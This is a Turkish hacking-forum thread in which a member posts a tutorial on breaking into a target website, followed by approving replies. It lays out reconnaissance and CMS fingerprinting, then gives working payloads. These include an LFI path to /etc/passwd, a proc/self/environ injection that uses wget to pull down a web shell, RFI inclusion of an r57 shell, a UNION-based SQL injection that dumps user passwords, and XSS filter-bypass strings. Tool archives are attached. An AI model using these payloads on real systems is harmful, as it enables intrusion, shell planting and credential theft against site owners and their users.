Welcome to Spyhackerz family! Log in or Sign up to join us

HEDEF Site Acik Arama Spy özel Dokuman

Discussion in 'Hack Dökümanları - Hack Articles' started by Isko~, Mar 9, 2016.

Thread Status:
Not open for further replies.
  1. Isko~

    Isko~ Major

    Katılım:Aralık 2, 2015
    Mesajlar:
    841
    Özel Mesaj Yolla
    Merhaba Spy Ailesi

    Bugun sizlere hedef site nasil hacklenir, nasil acik aranir, nasil analiz edilir hepsini anlatmaya calisagim. Ilk önce hedef sitemizi secip bilgi toplamamiz lazim
    Bilgi den kastim ; whois, sunucu tarama, sitenin scripti, Sunucu daki baska siteden hedef’e dalma, Acik arama ve shell sokmak.

    Whois
    Who.is sitesine girip, whois cekebilirsin boylece site hanki hosta barindigini, kime ait oldugunu ögrenebiliriz.

    Site : Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    [​IMG]

    Sunucu tarama
    Sunucu tarama bize hedef sitede acik bulamazsak eger, sunucudan bir sitenin acigindan yararlarak servere girmemizi saglariz, boylece istedigimiz hedefe ulasabilirsiniz.
    Sunucu taramasi nasil yapilir ?
    Bunun icin lookup siteleri vardir veya PHP ile kodlanmis scriptler veya Toolar mevcuttur.
    Tool(rar icinde mevcuttur)

    [​IMG]


    Sitenin scripti nedir ? Hanki script kullaniliyor? Nasil anlarim ?

    Ilk once url de en önemli kisma bakmamiz lazim, Aceba Sitenin dosya uzantilari nedir ? .php , .asp, .aspx Boylece ilk goruste sitenin yazilim dilini ogreniriz. [PHP ile kodlanmis, veya asp, veya aspx…]
    Bazi insanlar siteye girdiginde direk anlar site hanki script kurulu oldugunu..(hack deneyimden kaynaklaniyordur illaki)
    Simdi diyelim arayuzu tanimadik ilk once Footer bakariz eger footer da Powered by Wordpress yazarsa, veya Powered by Joomla, Powered by Seditio, vs Powered by xxx sitenin scripti’dir.

    [​IMG]


    Eger footer’da herhangi gibi birsey powered by xxx yazmazsa, kaynak kodunu goruntuleriz.
    Kaynak kodlarindan sitenin scriptini nasil anlarim ?
    Wordpress de -> Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım
    Gibi wp-contents wordpress ‘in dosya yollarindan biridir… yani sitenin wordpress oldugu anlarim (burdaki olay wordpress’in dosyalarini tanimaniz lazim veya diger scriptlerin... )
    Olay eger joomla deilse, wordpress deilse cotonti, seditio deilse baska hanki scriptler var diye aklinizda soru isareti varsa, bunu tek cozumu kaynak kodlarindan /dosyayolu/dosyayolu/
    su kisimlari kopyalayip google e yapisitirip aratmaniz lazim. Böylece indexlenmis olan dosya yolari size scriptin ismini daha cabuk bulmanizda fayda edecektir ve boylelikle hemen exploit aramanizi hizlandirmis olacaksiniz.

    Hedef sitemizin whois cektik, Sunucudaki siteleri cektik, Sitenin hanki script oldugunu ogrendik sira geldi sitenin acigini aramaya.

    Hedef sitede acik nasil ararim ?

    Hedef sitede acigi scriptine gore arariz, yazilim diline, kodlarina gore arama yapariz.

    Örnek veriyorum ;: wordpress tabanli bir sitemiz var , o wordpress surumune gore exploitlara bakarim, kaynak kodlarinda eklentiler bile cikar, o eklentilere gore exploit ararim , exploit kullanimi zor deildir.
    Aynisi joomla, seditio, cotonti gibi scriptlere de gecerlidir.

    exploit nasil ararim ?

    Wordpress.com/plugins/exploitsiolanplug/xskod/..

    Burdaki olay exploitsiolanplug nine gore exploit aramak

    Google => exploitsiolanplug exploit
    Google => inurl: exploitsiolanplug exploit

    Böylece size kullanmis oldugu pluginlerin exploitleri mevcutmu deilmi diye aramanizi saglar.
    Unutmayin sadece pluginde acik yoktur,

    Yöntemler :

    Upload acigi olabilir

    SQL injection acigi

    RFI acigi

    Lfi acigi


    Admin yolunu bulup sifre kirma olabilir bunlar hepsi sitede acik arama kategorisine girer.

    //

    Örnekler

    LFI Acigi

    LFI acigi olusturmasi


    index.php dosyası:

    Code:
    <?php
    include($_GET['sayfa'])
    ?>
    
    index.php?sayfa=../../../../../../../../../etc/passwd


    Ornek :

    Sitesi : Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    X-Bug Browser by isko tool ile sana url de girmen gerekenleri secip bug basman yeterli olcaktir, toolsuzda olur tabi

    Komutlar basit

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    Code:
    Warning: include(includes/../../etc/passwd) [function.include]: failed to open stream: No such file or directory in/home/costinejuv/www/index2.php on line64
    Diye hata aldik

    Devam ediyoruz


    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    Yine ayni hatayi aldik

    Devam ediyoruz

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    Ve passwd listesi geldi


    [​IMG]

    Bukadar basit arkadaslar…

    Burda onemli olan lfi acigindan shell yuklemeniz ve daha kolay hacklemeniz olcaktir

    Kodumuz

    proc/self/environ%00&cmd=wgetLinkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım-Oshell.php

    olarak girip shelli yuklememiz lazim (unutmayin bu her lfi de yaramayabilir verdigim ornek sitede yaramadi.)


    Devami...
     

    Attached Files:

    • 4.zip
      File size:
      1,004 bytes
      Okunma:
      125
    • 2.zip
      File size:
      231.7 KB
      Okunma:
      140
    • 3.zip
      File size:
      139.8 KB
      Okunma:
      124
    Nobody, Anarchosa, Code Red and 7 others like this.
  2. Owner
    Owner
    Isko~

    Isko~ Major

    Katılım:Aralık 2, 2015
    Mesajlar:
    841
    Özel Mesaj Yolla
    RFI acigi kullanimi

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım bazen
    txt? Olarak yaparsanizda sonuc alabilirsiniz. Veya ?? veya 3-4-5-6-7-8-9 x ...

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım?
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım ??
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım ???
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım ???? ve boyle devam eder

    Rfi acigi Remote file inclusion, Yani uzaktan dosya cagirmadir, uzaktan shellimizi cagircagiz, url son kismina shell adresimi yaziyorum (TXT) olarak bunu google ; r57.txt olarak aratirsaniz bulursunuz.

    Blog’un hakimmda.php kodlarinda include kodu kullaniyorsa yuksek ihtimal remote file inclusion yani dosya cagirma islemi gerceklestirebiliriz.

    Rfi nin olustugu kod hatasi

    include(“$hakkimda/guncel/hakkimda.php”);

    Bu satirdaki “$” isareti bulunan paramtreden dogan hata kodu ile uzaktan dosya cagirmak mumkundur.

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım?

    yaparak shellimizi cagirabiliriz.

    Upload acigi

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım veya /upload/upload.php veya blog’un her han gibi bir klasörde upload acigi mevcut ise shellimizi yukleriz.
    Her site .php uzantisini uygun gormez onun icin bazi shellerimizi shell.gif;.php yapariz.

    SQL acigi

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    url=tirnak isareti koyarak sayfada sql hatasi vermeye calisiriz

    Bazi sitelerde sql hatalarini verir, bazi sitelerde bos beyaz sayfa hatasi alirsiniz egerki boyle birsey ile karsilasirsaniz eger hata yoktur demeyin J deneyin zorlayin

    Uyeler.php klasorumuz

    Code:
    <?php
    
    $baglan = mysql_pconnect("localhost","root","spyspy");    / veritabanına bağlanıyoruz
    $baglan = mysql_select_db("sqli",$baglan);    / oluşturduğumuz veritabanımızı seçiyoruz
    
    $id = $_GET["id"];
    $sorgula = "SELECT * FROM uye WHERE id=".$id;
    $cek = mysql_fetch_object(mysql_query($sorgula));
    
    echo 'Olusan Sorgu: '.$sorgula."<br>";
    echo $cek->username."<br>".$cek->email;
    
    ?>


    id= query stringin filtrelenmeden dinamik sql sorgusuyla birlestirilmistir

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    diyerek sql hatasi almamizi saglar.

    [​IMG]

    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım?id=-1+UNION+SELECT+1,CONTACT(id,0x3a,username,password)+,4,+FROM+uye

    [​IMG]

    Gordgunuz gibi user pass aldik

    XSS acigi

    Xss icin fazla sizlere bilgi vermicem fakat birkac ornek verebilirim …

    Açıklı parametre GET(id=1 gibi) metodu ile alınıyorsa;
    Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım src=Linkleri görebilmek için login-giriş yapman gerekiyor veya konuya like atman lazım

    Bazı Alert Kodları

    ')alert('xss');
    ;alert('xss');
    <script>alert(123)</script>
    <script type=text/javascript>alert("spy")</script> <script>alert("tht");</script>
    <script>alert("spy"/)</script>
    <script>var deger=1;alert("spy")</script>

    Bypass filtreleme ozellik kodlari

    <***** type=text/javascript>alert("Spyhackerz")</*****>
    <*****>alert("Spyhackerz")</*****>;
    <*****>alert("Spyhackerz ");</*****>
    <*****>alert("Spyhackerz "/)</*****>
    <*****>var var = 1; alert(var)</*****>


    Admin panel password crack

    Burda sizin kisisel zekaniz devreye girmesi lazim cunku admin password bulmasi okdr basit deildir…

    Fakat bazi PHP tooler mevcut bruteforcer vs…

    Kendim icin kodlamis oldugum basit uyduruk bisi var elimde ise yariyor ama …

    [​IMG]

    Evet arkadaslar Gördugunuz gibi hedef sitede farkli farkli yontemler denedik, RFI LFI upload, Admin hack ..

    Simdi diyelimki Hicbiri Ise yaramadi Ozaman (2.) Sunucudaki siteleri versiyon scanner ile taramak olcak. Sunucudaki sitelerin scriptlerine gore tarama yapar ve size site x su scripti kullaniyor diye cevap verir, boylece size tek tek hanki script oldugungan zaman kazandirir

    [​IMG]


    [​IMG]

    Evet bize seditio bulundu dedi (toolu ozellestirdim daha etkili hale getircim, birazcik kendiniz hayal gucunuzu , zekanizi kullanip degisik seyler cikarabilirsiniz.)

    Seditio Exploitlerini aramaya basliyabiliriz ve sitede uygulamaya baslariz…

    SON OLARAKDA Sosyal muhendisligi deniyebilirsiniz … Buda sizin nomisizliginize kalmmis bisi :D

    Admin Panel Finder burda (dosya boyutu yuksek)
    Register or to view Spoiler content!

    Spyhackerz.com

    Isko
     
    Last edited: Mar 9, 2016
    Anarchosa, crayz10, TrazeR and 11 others like this.
  3. Mectruy

    Mectruy Owner

    Katılım:Aralık 1, 2015
    Mesajlar:
    2,427
    Uzmanlık Alanları
    Bilişim uzmanı
    Php & Mysql
    Özel Mesaj Yolla
    Sağlam bir döküman olmuş , aslında dökümandan öte bir ar-ge çalışması gibi.
     
    Isko~ likes this.
  4. eline sağlık çok güzel anlatım olmuş
     
    Isko~ likes this.
  5. 10 numara 5 yıldız Yeniler için paha biçilmez bir konu olmuş Emeğine Sağlık İsko Harikasın
     
    Isko~ likes this.
  6. by_hero

    by_hero Üye

    Katılım:Aralık 2, 2015
    Mesajlar:
    30
    Özel Mesaj Yolla
    İsko kalitesini yine belli etmiş :)
     
    Isko~ likes this.
  7. FIRTINA

    FIRTINA Kıdemli üye

    Katılım:Aralık 2, 2015
    Mesajlar:
    365
    Uzmanlık Alanları
    www.imhatimi.org
    www.spyhackerz.com
    //...FIЯTINA
    Özel Mesaj Yolla
    ellerine sağlık hacı çox yahşi anlatmışsın :D
     
    Isko~ likes this.
  8. Masum

    Masum Üye

    Katılım:Apr 4, 2016
    Mesajlar:
    88
    Özel Mesaj Yolla
    Çok iyi paylaşımlar bilgilendirmede güzel çok teşekkürler eline sağlık
     
  9. Bug

    Bug Üye

    Katılım:Aralık 2, 2015
    Mesajlar:
    100
    Uzmanlık Alanları
    Script Cracker
    Özel Mesaj Yolla
    Yemekten sonra bakayım konuya hemen :)
     
  10. Beyaz Gölge

    Beyaz Gölge Üye

    Katılım:May 10, 2016
    Mesajlar:
    71
    Özel Mesaj Yolla
    Devamınıda Bekleriz Kardeşim Eline Sağlık Arge Super
     
  11. Reality

    Reality Üye

    Katılım:Jul 30, 2016
    Mesajlar:
    43
    Özel Mesaj Yolla
    Güzel döküman ellerine sağlık kardeşim
     
  12. miller88

    miller88 Üye

    Katılım:Sep 12, 2016
    Mesajlar:
    6
    Özel Mesaj Yolla
    kaliteli konu olmuş lfi ve rfi açığını görünce ağlayasım geldi , özlemişim :D
     
  13. qraLbosp

    qraLbosp Üye

    Katılım:Jun 3, 2016
    Mesajlar:
    303
    Özel Mesaj Yolla
    adamsın kardeşim
     
  14. dr4cula

    dr4cula Üye

    Katılım:Sep 2, 2016
    Mesajlar:
    57
    Özel Mesaj Yolla
    Parmaklarina saglik hocam
     
  15. Staiola

    Staiola Üye

    Katılım:Mar 30, 2016
    Mesajlar:
    15
    Özel Mesaj Yolla
    bu kadar kolay olsa keşke yıllardır denıyorum bu yontemlerı hedeflerımde iş yapmıyor bunun dışında başka önemli birşeyler var yoksa piyasada okadar hack team forumu yada onemlı siteler hacklenmez
     
  16. Dragon Caliph

    Dragon Caliph Üye

    Katılım:Oct 9, 2016
    Mesajlar:
    196
    Özel Mesaj Yolla
    Shell yükleme konusunu çözemedim?
     
  17. Y1LD1Z

    Y1LD1Z Üye

    Katılım:Aralık 27, 2016
    Mesajlar:
    210
    Özel Mesaj Yolla
    YApmışsın yine yapcağını
     
  18. RichmanTR

    RichmanTR Üye

    Katılım:Ocak 16, 2017
    Mesajlar:
    20
    Özel Mesaj Yolla
    Çok değerli bir anlatım olmuş teşekkürler emeğine sağlık.
     
  19. x43

    x43 Üye

    Katılım:Ocak 22, 2017
    Mesajlar:
    3
    Özel Mesaj Yolla
    Çok sade ve anlaşılır bir dokuman, kitaplarda yazanlara nazaran. Çok beğendim, eline emeğine saklık isko.
     
  20. CyberisTR

    CyberisTR Üye

    Katılım:Ocak 15, 2017
    Mesajlar:
    10
    Özel Mesaj Yolla
    Yakışıklı abim eline sağlık :)
     
Loading...
Thread Status:
Not open for further replies.

Bu sayfayı Paylaş